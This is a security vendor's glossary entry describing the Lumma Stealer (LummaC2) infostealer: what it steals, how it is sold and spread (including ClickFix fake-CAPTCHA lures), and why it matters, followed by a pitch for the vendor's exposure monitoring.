Lumma Stealer (LummaC2)
Also known as: LummaC2, Lumma, LummaC2 Stealer
Lumma Stealer (LummaC2) is a malware-as-a-service infostealer that steals browser credentials, cookies, cryptocurrency wallets, and 2FA data from Windows systems. It became one of the dominant stealers after the decline of earlier families and is known for rapid, frequent updates.
What is Lumma Stealer?
Lumma Stealer, also tracked as LummaC2, is a Russian-speaking malware-as-a-service infostealer that rose to prominence as older families lost market share. It is sold via tiered subscriptions on underground forums and Telegram, with higher tiers offering more advanced evasion and data-collection features.
LummaC2 is notable for its frequent updates, active developer support, and use of sophisticated techniques to evade detection and analysis.
What data does Lumma steal?
LummaC2 harvests saved passwords, autofill data, and session cookies from major browsers, cryptocurrency wallet data and browser extensions, and files matching configurable patterns. It can also pull system information and, in some versions, restore expired Google session cookies — a capability that drew significant attention because it can re-enable access to accounts after a session would normally have ended.
How does Lumma spread?
Lumma is distributed through fake CAPTCHA / "ClickFix" pages that trick users into running malicious commands, cracked software, malvertising, phishing, and deceptive download pages. The ClickFix social-engineering technique — instructing victims to paste a command into the Windows Run dialog — has been a particularly common delivery method.
Why Lumma matters
LummaC2 has been responsible for a very large share of newly harvested stealer logs. Its scale, frequent updates, and session-restoration features make it a persistent threat to both consumer and enterprise accounts, and its logs are a major input to the credential-theft economy.
VantaPrism tracks LummaC2 as one of its monitored families, ingesting and parsing Lumma logs in near real time. Security teams can attribute exposures to LummaC2 specifically, see infection timelines, and assess whether stolen cookies put their authenticated sessions at risk.
Check Your Exposure arrow_forwardFrequently Asked Questions
What is the difference between Lumma and LummaC2?
Can Lumma restore expired session cookies?
How is Lumma delivered to victims?
Related Terms
Infostealer malware is a category of malicious software designed to silently harvest sensitive data — passwords, sess…
A stealer log is the package of data exfiltrated from a single device by infostealer malware. It typically contains s…
RedLine Stealer is an information-stealing malware (infostealer) sold as malware-as-a-service that harvests saved bro…
Cookie theft is the stealing of browser cookies — especially authenticated session cookies — so attackers can imperso…
Session hijacking is the takeover of an authenticated session by stealing and reusing its session token or cookie. Be…
Malware-as-a-service (MaaS) is a criminal business model in which malware authors rent or sell their software, infras…